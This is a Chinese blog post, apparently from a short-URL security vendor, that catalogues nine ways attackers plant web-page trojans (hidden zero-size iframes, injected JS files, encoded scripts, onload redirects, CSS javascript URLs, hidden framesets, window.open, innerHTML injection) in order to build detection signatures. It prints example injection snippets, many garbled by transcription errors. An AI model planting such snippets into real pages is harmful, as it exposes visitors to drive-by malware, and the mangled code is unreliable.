短网址网页木马常见9种挂马技术

2016年11月25日来源:980短网址原创分类:短网址阅读(119评论(1

短网址网页源码的DOM解析技术,在处理完爬取下来的短网址网页源码后,接下来要进行的是短网址源码与短网址页面木马特征值的匹配。要完成匹配的工作,就需要建立短网址网页木马特征值的正则表达式库,然后实现短网址网页源码与正则表达式的匹配。

挂马方式

 

短网址网页木马解析之挂马方式

由于该技术是公司项目,主要为互联网提供安全保护服务,因此在项目成立初就针对些网站进行了详细的调研,对此类站点遇到的挂马方式进行了详细的总结和整理,再结合目前互联网上的主流挂马方式,建立起短网址的木马特征库。根据前期调研总结了此类站点最常的挂马方式.具体如下:

 

短网址木马解析1框架挂马

<ifiaine src ="网木马地址"width  “0 height  “0></iframe>

iframe是普通的HTML标签,主要用来在一个网页界面中,划分出左右或者上下的框架,侵入者利用ifome的功能,在正常网页中,写入长宽为0的隐藏框架,让用户在不知不觉中就打开了木马网站。

 

短网址木马解析2、JS文件挂马:

JS文件挂马方法是,将指向木马的代码写入文件,保存为xxx.js,然后通过写入<script language= "javascript" src  "xxx.Js></script>来实现桂马。指向木马的代码如下:

docume.write("<iframe width 0 height  "0" src=网页木马地址>)

 

短网址木马解析3、JS变形加密:

利用jscript.encode加密,会使代码更具隐蔽性,这里的挂马网址的文件后缀是muma.txt,除此外,还可引入其他扩展名的JS代码。

<script language ="jscript.Encode src  

"http://www.xxx.com/muma.txt></script>

 

短网址木马解析4body挂马:

使用如下代码,就可政使网页在加载完成的时候跳转到网页木马的网址

<body onload ="window.location 网页木马地址;></body〉。

 

短网址木马解析5css挂马:

在文挡的样式表中使用URL函数引入木马链接,具体格式如下:

body  background-image  url javascript:

document.write ("<script src

http://www.xx.Net/muma.Js〉</script>’)}

 

短网址木马解析6图片挂码:

这种挂马方式利用图片作为伪装,用户点击图片,一个看不见的窗口被活运行,木马也随之被运行。挂马代码如下:

<html>

<iframe src 网页木马地址height   width

  ></iframe>

<Lmg src =‘图片地址’></center>

</html>

 

短网址木马解析7利用隐藏的分割框架引入网页木马示例代码如下:

<frameset row = ‘‘444,0cols  "*

<frame src 打开网页framborder  "no" scrolling

=auto"noresize marginwidthmarginheight="0

fim src="网巧木马地址"framborder  "no" scrolling

 "auto" noresize marginwidth=0marginheight  "0’’>

</frameset>

 

短网址木马解析8Java 挂马:

<script language=javascript

window.Open( 网页木马地址",””,toolbar = no, location=no,

directories no, status=no, menubar  no,

scrollbar=no, width 1, height  );

 

短网址木马解析9隐蔽挂马:

top.documentbody.innerHTML  top.documentbody.

nnerHTML  '\r\n<iframe src ;

上一篇:短网址网站检测流程的实现

下一篇:短网址网页木马特征解析

精彩评论
评论
热门文章
980安全专家教您认识短链接安全
防护恶意网址用短链接欺骗的对策
对付恶意短链接我有妙招
蓝瘦、香菇,每天和短链接技术打交道
短信利用短网址撬动移动营销市场
文章归档
2016年12月
2016年11月
2016年10月
2016年09月
2016年07月
2016年06月
热门标签
短网址
短链接
网址缩短
短网址服务
短网址应用
短网址营销
短网址生成
缩短网址
短链接生成
短网址还原
短网址检测法
自定义短网址